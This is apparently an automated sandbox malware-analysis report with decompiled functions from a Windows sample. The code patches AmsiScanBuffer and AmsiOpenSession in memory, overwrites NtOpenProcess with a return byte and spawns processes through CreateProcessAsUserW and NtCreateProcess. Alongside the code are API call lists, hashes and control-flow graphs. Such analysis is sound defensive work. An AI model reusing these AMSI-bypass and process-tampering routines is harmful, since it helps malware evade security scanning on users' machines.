                                                                                                  • Instruction ID: 3b7eee43f592f5287eb675d4cf2f41c9b95b302df390a288aa83308aa40eb68c
                                                                                                  • Opcode Fuzzy Hash: 579f232d8670217a7c16867b5ba8d6309b06c6190183eddfbf5260425c0f0363
                                                                                                  • Instruction Fuzzy Hash: 62F2403CA112698BEB21EB68CC84BDE73FAAF45705F1041A1D509FB314DE70AE859F52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 4045 2855a90-2855ad1 GetModuleFileNameA RegOpenKeyExA 4046 2855b13-2855b56 call 28558cc RegQueryValueExA 4045->4046 4047 2855ad3-2855aef RegOpenKeyExA 4045->4047 4052 2855b58-2855b74 RegQueryValueExA 4046->4052 4053 2855b7a-2855b94 RegCloseKey 4046->4053 4047->4046 4048 2855af1-2855b0d RegOpenKeyExA 4047->4048 4048->4046 4050 2855b9c-2855bcd lstrcpynA GetThreadLocale GetLocaleInfoA 4048->4050 4054 2855cb6-2855cbd 4050->4054 4055 2855bd3-2855bd7 4050->4055 4052->4053 4056 2855b76 4052->4056 4057 2855be3-2855bf9 lstrlenA 4055->4057 4058 2855bd9-2855bdd 4055->4058 4056->4053 4059 2855bfc-2855bff 4057->4059 4058->4054 4058->4057 4060 2855c01-2855c09 4059->4060 4061 2855c0b-2855c13 4059->4061 4060->4061 4062 2855bfb 4060->4062 4061->4054 4063 2855c19-2855c1e 4061->4063 4062->4059 4064 2855c20-2855c46 lstrcpynA LoadLibraryExA 4063->4064 4065 2855c48-2855c4a 4063->4065 4064->4065 4065->4054 4066 2855c4c-2855c50 4065->4066 4066->4054 4067 2855c52-2855c82 lstrcpynA LoadLibraryExA 4066->4067 4067->4054 4068 2855c84-2855cb4 lstrcpynA LoadLibraryExA 4067->4068 4068->4054
                                                                                                  C-Code - Quality: 87%
                                                                                                  			E02855A90(CHAR* __eax) {
                                                                                                  				CHAR* _v8;
                                                                                                  				void* _v12;
                                                                                                  				char _v15;
                                                                                                  				char _v17;
                                                                                                  				char _v18;
                                                                                                  				char _v22;
                                                                                                  				int _v28;
                                                                                                  				char _v289;
                                                                                                  				long _t44;
                                                                                                  				long _t61;
                                                                                                  				long _t63;
                                                                                                  				CHAR* _t74;
                                                                                                  				CHAR* _t99;
                                                                                                  				CHAR* _t100;
                                                                                                  				intOrPtr _t104;
                                                                                                  				struct HINSTANCE__* _t112;
                                                                                                  				void* _t115;
                                                                                                  				void* _t117;
                                                                                                  				intOrPtr _t118;
                                                                                                  
                                                                                                  				_t115 = _t117;
                                                                                                  				_t118 = _t117 + 0xfffffee0;
                                                                                                  				_v8 = __eax;
                                                                                                  				GetModuleFileNameA(0,  &_v289, 0x105);
                                                                                                  				_v22 = 0;
                                                                                                  				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                  				if(_t44 == 0) {
                                                                                                  					L3:
                                                                                                  					_push(_t115);
                                                                                                  					_push(0x2855b95);
                                                                                                  					_push( *[fs:eax]);
                                                                                                  					 *[fs:eax] = _t118;
                                                                                                  					_v28 = 5;
                                                                                                  					E028558CC( &_v289, 0x105);
                                                                                                  					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E02855CFC, 0, 0,  &_v22,  &_v28) != 0) {
                                                                                                  						_v22 = 0;
                                                                                                  					}
                                                                                                  					_v18 = 0;
                                                                                                  					_pop(_t104);
                                                                                                  					 *[fs:eax] = _t104;
                                                                                                  					_push(E02855B9C);
                                                                                                  					return RegCloseKey(_v12);
                                                                                                  				} else {
                                                                                                  					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                  					if(_t61 == 0) {
                                                                                                  						goto L3;
                                                                                                  					} else {
                                                                                                  						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                  						if(_t63 != 0) {
                                                                                                  							lstrcpynA( &_v289, _v8, 0x105);
                                                                                                  							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
                                                                                                  							_t112 = 0;
                                                                                                  							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                                                                  								_t99 =  &(( &_v289)[lstrlenA( &_v289)]);
                                                                                                  								L12:
                                                                                                  								if( *_t99 != 0x2e && _t99 !=  &_v289) {
                                                                                                  									_t99 = _t99 - 1;
                                                                                                  									goto L12;
                                                                                                  								}
                                                                                                  								_t74 =  &_v289;
                                                                                                  								if(_t99 != _t74) {
                                                                                                  									_t100 =  &(_t99[1]);
                                                                                                  									if(_v22 != 0) {
                                                                                                  										lstrcpynA(_t100,  &_v22, 0x105 - _t100 - _t74);
                                                                                                  										_t112 = LoadLibraryExA( &_v289, 0, 2);
                                                                                                  									}
                                                                                                  									if(_t112 == 0 && _v17 != 0) {
                                                                                                  										lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
                                                                                                  										_t112 = LoadLibraryExA( &_v289, 0, 2);
                                                                                                  										if(_t112 == 0) {
                                                                                                  											_v15 = 0;
                                                                                                  											lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
                                                                                                  											_t112 = LoadLibraryExA( &_v289, 0, 2);
                                                                                                  										}
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  							return _t112;
                                                                                                  						} else {
                                                                                                  							goto L3;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}























                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02850000,02877790), ref: 02855AAC
                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,02877790), ref: 02855ACA
                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,02877790), ref: 02855AE8
                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02855B06
                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02855B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02855B4F
                                                                                                  • RegQueryValueExA.ADVAPI32(?,02855CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02855B95,?,80000001), ref: 02855B6D
                                                                                                  • RegCloseKey.ADVAPI32(?,02855B9C,00000000,?,?,00000000,02855B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02855B8F
                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02855BAC
                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02855BB9
                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02855BBF
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02855BEA
                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C31
                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C41
                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C69
                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C79
                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02855C9F
                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02855CAF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                  • API String ID: 1759228003-2375825460
                                                                                                  • Opcode ID: de06f682054973327dc659ca6601d61cdacbaf5ca8aae8da8bdfffa5b62e8093
                                                                                                  • Instruction ID: 35f63b4aa711d24b0549b09d7adf915a8af08425f4f4387a42bde156b4d52669
                                                                                                  • Opcode Fuzzy Hash: de06f682054973327dc659ca6601d61cdacbaf5ca8aae8da8bdfffa5b62e8093
                                                                                                  • Instruction Fuzzy Hash: 41517C7DA4026C7EFB25D6A4CC49FEF77BD9B04744F8001A1AE08E6181E7789E448F66
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 62%
                                                                                                  			E0286C194(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                                  				char _v5;
                                                                                                  				char _v8;
                                                                                                  				struct _STARTUPINFOW _v76;
                                                                                                  				struct _PROCESS_INFORMATION _v92;
                                                                                                  				char _v348;
                                                                                                  				char _v352;
                                                                                                  				char _v356;
                                                                                                  				char _v360;
                                                                                                  				char _v364;
                                                                                                  				intOrPtr _v368;
                                                                                                  				char _v372;
                                                                                                  				char _v376;
                                                                                                  				char _v380;
                                                                                                  				char _v384;
                                                                                                  				char _v388;
                                                                                                  				char _v392;
                                                                                                  				char _v396;
                                                                                                  				char _v400;
                                                                                                  				char _v404;
                                                                                                  				char _v408;
                                                                                                  				char _v412;
                                                                                                  				char _v416;
                                                                                                  				char _v420;
                                                                                                  				char _v424;
                                                                                                  				char _v428;
                                                                                                  				WCHAR* _t111;
                                                                                                  				WCHAR* _t119;
                                                                                                  				void* _t120;
                                                                                                  				void* _t156;
                                                                                                  				intOrPtr _t158;
                                                                                                  				void* _t167;
                                                                                                  				void* _t170;
                                                                                                  				void* _t178;
                                                                                                  				void* _t181;
                                                                                                  				void* _t189;
                                                                                                  				void* _t192;
                                                                                                  				intOrPtr _t193;
                                                                                                  				void* _t200;
                                                                                                  				intOrPtr _t202;
                                                                                                  				intOrPtr _t203;
                                                                                                  
                                                                                                  				_t202 = _t203;
                                                                                                  				_t158 = 0x34;
                                                                                                  				do {
                                                                                                  					_push(0);
                                                                                                  					_push(0);
                                                                                                  					_t158 = _t158 - 1;
                                                                                                  					_t204 = _t158;
                                                                                                  				} while (_t158 != 0);
                                                                                                  				_push(_t158);
                                                                                                  				_t1 =  &_v8;
                                                                                                  				 *_t1 = _t158;
                                                                                                  				_t200 = __edx;
                                                                                                  				_t156 = __eax;
                                                                                                  				_push(_t202);
                                                                                                  				_push(0x286c492);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t203;
                                                                                                  				E02854698( &_v352, "AmsiOpenSession");
                                                                                                  				_push(_v352);
                                                                                                  				E02854698( &_v356, "Amsi");
                                                                                                  				_pop(_t167); // executed
                                                                                                  				E02867B80(_v356, _t167); // executed
                                                                                                  				E02854698( &_v360, "AmsiScanBuffer");
                                                                                                  				_push(_v360);
                                                                                                  				E02854698( &_v364, "Amsi");
                                                                                                  				_pop(_t170); // executed
                                                                                                  				E02867B80(_v364, _t170); // executed
                                                                                                  				_push(0x286c4d4);
                                                                                                  				E02854704( &_v372, _t156, _t204);
                                                                                                  				_push(_v372);
                                                                                                  				_push(0x286c4e0);
                                                                                                  				E02854704( &_v376, _t200, _t204);
                                                                                                  				_push(_v376);
                                                                                                  				E02854824();
                                                                                                  				E0285473C( &_v348, 0xff, _v368);
                                                                                                  				E02853098( &_v76, 0x44);
                                                                                                  				_v76.cb = 0x44;
                                                                                                  				_v76.dwFlags = 1;
                                                                                                  				_v76.wShowWindow =  *_t1;
                                                                                                  				E02854698( &_v380, "AmsiScanBuffer");
                                                                                                  				_push(_v380);
                                                                                                  				E02854698( &_v384, "Amsi");
                                                                                                  				_pop(_t178); // executed
                                                                                                  				E02867B80(_v384, _t178); // executed
                                                                                                  				E02854698( &_v388, "AmsiOpenSession");
                                                                                                  				_push(_v388);
                                                                                                  				E02854698( &_v392, "Amsi");
                                                                                                  				_pop(_t181); // executed
                                                                                                  				E02867B80(_v392, _t181); // executed
                                                                                                  				E02854704( &_v404, _t156, _t204);
                                                                                                  				E02857F10(_v404,  &_v400);
                                                                                                  				E02854D38( &_v396, E02854964(_v400));
                                                                                                  				_t111 = E02854DB4(_v396);
                                                                                                  				E02854704( &_v412,  &_v348, _t204);
                                                                                                  				E02854D38( &_v408, E02854964(_v412));
                                                                                                  				_t119 = E02854DB4(_v408);
                                                                                                  				_t120 =  *0x28a6540; // 0x0
                                                                                                  				CreateProcessAsUserW(_t120, 0, _t119, 0, 0, 0, 0x30, 0, _t111,  &_v76,  &_v92); // executed
                                                                                                  				NtCreateProcess(_v92.hProcess, 0x1f0fff, 0x28a662c, 0, 1, 0, 0, 0);
                                                                                                  				E02854698( &_v416, "AmsiOpenSession");
                                                                                                  				_push(_v416);
                                                                                                  				E02854698( &_v420, "Amsi");
                                                                                                  				_pop(_t189); // executed
                                                                                                  				E02867B80(_v420, _t189); // executed
                                                                                                  				E02854698( &_v424, "AmsiScanBuffer");
                                                                                                  				_push(_v424);
                                                                                                  				E02854698( &_v428, "Amsi");
                                                                                                  				_pop(_t192); // executed
                                                                                                  				E02867B80(_v428, _t192); // executed
                                                                                                  				if(_v5 != 0) {
                                                                                                  					WaitForSingleObject(_v92.hProcess, 0xffffffff);
                                                                                                  					CloseHandle(_v92);
                                                                                                  					CloseHandle(_v92.hThread);
                                                                                                  				}
                                                                                                  				_pop(_t193);
                                                                                                  				 *[fs:eax] = _t193;
                                                                                                  				_push(0x286c499);
                                                                                                  				E028544C4( &_v428, 5);
                                                                                                  				E02854C24( &_v408);
                                                                                                  				E028544C4( &_v404, 2);
                                                                                                  				E02854C24( &_v396);
                                                                                                  				return E028544C4( &_v392, 0xb);
                                                                                                  			}












































                                                                                                  APIs
                                                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?,?,?,?,?,?), ref: 0286C393
                                                                                                  • NtCreateProcess.C:\WINDOWS\SYSTEM32\NTDLL(?,001F0FFF,028A662C,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000), ref: 0286C3B0
                                                                                                    • Part of subcall function 02867B80: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02867C5B), ref: 02867BB8
                                                                                                    • Part of subcall function 02867B80: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BC6
                                                                                                    • Part of subcall function 02867B80: GetProcAddress.KERNEL32(6CFE0000,00000000), ref: 02867BDF
                                                                                                    • Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BFA
                                                                                                    • Part of subcall function 02867B80: VirtualProtectEx.KERNEL32(00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867C00
                                                                                                    • Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02867C2A
                                                                                                    • Part of subcall function 02867B80: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000), ref: 02867C30
                                                                                                    • Part of subcall function 02867B80: FreeLibrary.KERNEL32(6CFE0000,00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000), ref: 02867C3B
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,001F0FFF,028A662C,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0286C427
                                                                                                  • CloseHandle.KERNEL32(?,?,000000FF,?,001F0FFF,028A662C,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0286C430
                                                                                                  • CloseHandle.KERNEL32(?,?,?,000000FF,?,001F0FFF,028A662C,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0286C439
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Handle$CloseCreateCurrentLibraryVirtual$AddressFreeLoadMemoryModuleObjectProcProtectSingleUserWaitWrite
                                                                                                  • String ID: Amsi$AmsiOpenSession$AmsiScanBuffer$D
                                                                                                  • API String ID: 941487604-87056827
                                                                                                  • Opcode ID: ddfb394105fcdf1989058f577401bc69e3111f1286a97fc8414a5e37ad4eaf34
                                                                                                  • Instruction ID: 9ce122e3241ccf0f6ba16b226ac7d52c7a03807eb1ee7dd66662350eb92a23c3
                                                                                                  • Opcode Fuzzy Hash: ddfb394105fcdf1989058f577401bc69e3111f1286a97fc8414a5e37ad4eaf34
                                                                                                  • Instruction Fuzzy Hash: 5A71353DA001289FEB20EB64CC44BEEB7BBEF45310F5084D2E548E7645DA74AE858F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 71%
                                                                                                  			E02867B80(intOrPtr __eax, char __edx) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				char _v12;
                                                                                                  				CHAR* _t22;
                                                                                                  				struct HINSTANCE__* _t23;
                                                                                                  				struct HINSTANCE__* _t31;
                                                                                                  				intOrPtr _t41;
                                                                                                  				void* _t45;
                                                                                                  
                                                                                                  				_v12 = __edx;
                                                                                                  				_v8 = __eax;
                                                                                                  				E02854954(_v8);
                                                                                                  				E02854954(_v12);
                                                                                                  				_push(_t45);
                                                                                                  				_push(0x2867c5b);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t45 + 0xfffffff8;
                                                                                                  				LoadLibraryExA(E02854964(_v8), 0, 0); // executed
                                                                                                  				 *0x28a6344 = GetModuleHandleA(E02854964(_v8));
                                                                                                  				_t22 = E02854964(_v12);
                                                                                                  				_t23 =  *0x28a6344; // 0x6cfe0000
                                                                                                  				 *0x28a6348 = GetProcAddress(_t23, _t22);
                                                                                                  				VirtualProtectEx(GetCurrentProcess(), 0x28a6348, 0x190, 0x40, 0x28a634c);
                                                                                                  				E02852DE0(0x2856738, 4, 0x28a6348);
                                                                                                  				NtWriteVirtualMemory(GetCurrentProcess(), 0x28a6348, 0x2856738, 4, 0x28a634c);
                                                                                                  				_t31 =  *0x28a6344; // 0x6cfe0000
                                                                                                  				FreeLibrary(_t31); // executed
                                                                                                  				_pop(_t41);
                                                                                                  				 *[fs:eax] = _t41;
                                                                                                  				_push(0x2867c62);
                                                                                                  				return E028544C4( &_v12, 2);
                                                                                                  			}











                                                                                                  APIs
                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02867C5B), ref: 02867BB8
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BC6
                                                                                                  • GetProcAddress.KERNEL32(6CFE0000,00000000), ref: 02867BDF
                                                                                                  • GetCurrentProcess.KERNEL32(028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BFA
                                                                                                  • VirtualProtectEx.KERNEL32(00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867C00
                                                                                                  • GetCurrentProcess.KERNEL32(028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02867C2A
                                                                                                  • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000), ref: 02867C30
                                                                                                  • FreeLibrary.KERNEL32(6CFE0000,00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000), ref: 02867C3B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentLibraryProcessVirtual$AddressFreeHandleLoadMemoryModuleProcProtectWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 2990312385-0
                                                                                                  • Opcode ID: a98739c33bf528ff45d01850f56d621c4fdeee5ae33a80db820af1a050815b1a
                                                                                                  • Instruction ID: e909dae3c1f96a79fa66a417622c665c3f36f44655cbc6f8ddd7a7d93205336c
                                                                                                  • Opcode Fuzzy Hash: a98739c33bf528ff45d01850f56d621c4fdeee5ae33a80db820af1a050815b1a
                                                                                                  • Instruction Fuzzy Hash: D01184BCA80334AAFB00FFAC8C56B5EB7EDEF44701F9404207A25E7294EE7499018A15
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 4163 2867b24-2867b3f LoadLibraryA 4164 2867b74-2867b7c 4163->4164 4165 2867b41-2867b4c GetProcAddress 4163->4165 4166 2867b6e-2867b6f FreeLibrary 4165->4166 4167 2867b4e-2867b63 WriteProcessMemory 4165->4167 4166->4164 4167->4166 4168 2867b65-2867b6a 4167->4168 4168->4166 4169 2867b6c 4168->4169 4169->4166
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E02867B24(void* __eax, CHAR* __ecx) {
                                                                                                  				long _v20;
                                                                                                  				void _v24;
                                                                                                  				int _t11;
                                                                                                  				long _t12;
                                                                                                  				CHAR* _t15;
                                                                                                  				struct HINSTANCE__* _t17;
                                                                                                  				CHAR* _t18;
                                                                                                  				void* _t19;
                                                                                                  				void* _t20;
                                                                                                  
                                                                                                  				_t18 = __ecx;
                                                                                                  				_t20 = __eax;
                                                                                                  				_v24 = 0xc3;
                                                                                                  				_t12 = 0;
                                                                                                  				_t17 = LoadLibraryA(_t15);
                                                                                                  				if(_t17 > 0) {
                                                                                                  					_t19 = GetProcAddress(_t17, _t18);
                                                                                                  					if(_t19 != 0) {
                                                                                                  						_t11 = WriteProcessMemory(_t20, _t19,  &_v24, 1,  &_v20); // executed
                                                                                                  						if(_t11 != 0 && _v20 > 0) {
                                                                                                  							_t12 = 1;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					FreeLibrary(_t17);
                                                                                                  				}
                                                                                                  				return _t12;
                                                                                                  			}













                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNEL32(ntdll), ref: 02867B36
                                                                                                  • GetProcAddress.KERNEL32(00000000,NtOpenProcess), ref: 02867B43
                                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000001,?,00000000,NtOpenProcess,ntdll), ref: 02867B5C
                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,NtOpenProcess,ntdll), ref: 02867B6F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressFreeLoadMemoryProcProcessWrite
                                                                                                  • String ID: NtOpenProcess$ntdll
                                                                                                  • API String ID: 1038025411-4273736252
                                                                                                  • Opcode ID: 9f81b1c18d594d0a60fa94a441a449b39ee5fd1e8af99caeb6e76aaa597a9114
                                                                                                  • Instruction ID: 1ebdc5a66ad9d7178fa2b667d0cf0c59a868db58a781250765cc393e43ac753e
                                                                                                  • Opcode Fuzzy Hash: 9f81b1c18d594d0a60fa94a441a449b39ee5fd1e8af99caeb6e76aaa597a9114
                                                                                                  • Instruction Fuzzy Hash: F6F0B43E5052352ED22055685C44EBFA7DCCBC26B8F54027EFE58D6280EB21CC0493E2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%


                                                                                                  C-Code - Quality: 100%
                                                                                                  			E028679CC(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                                  				struct HINSTANCE__* _t7;
                                                                                                  
                                                                                                  				_t7 = GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"); // executed
                                                                                                  				 *0x28a6318 = GetProcAddress(_t7, "NtAllocateVirtualMemory");
                                                                                                  				NtAllocateVirtualMemory(_a4,  &_a8, 0,  &_a12, _a16, _a20); // executed
                                                                                                  				return _a8;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679D9
                                                                                                  • GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679DF
                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028679FF
                                                                                                  Strings
                                                                                                  • NtAllocateVirtualMemory, xrefs: 028679CF
                                                                                                  • C:\Windows\System32\ntdll.dll, xrefs: 028679D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
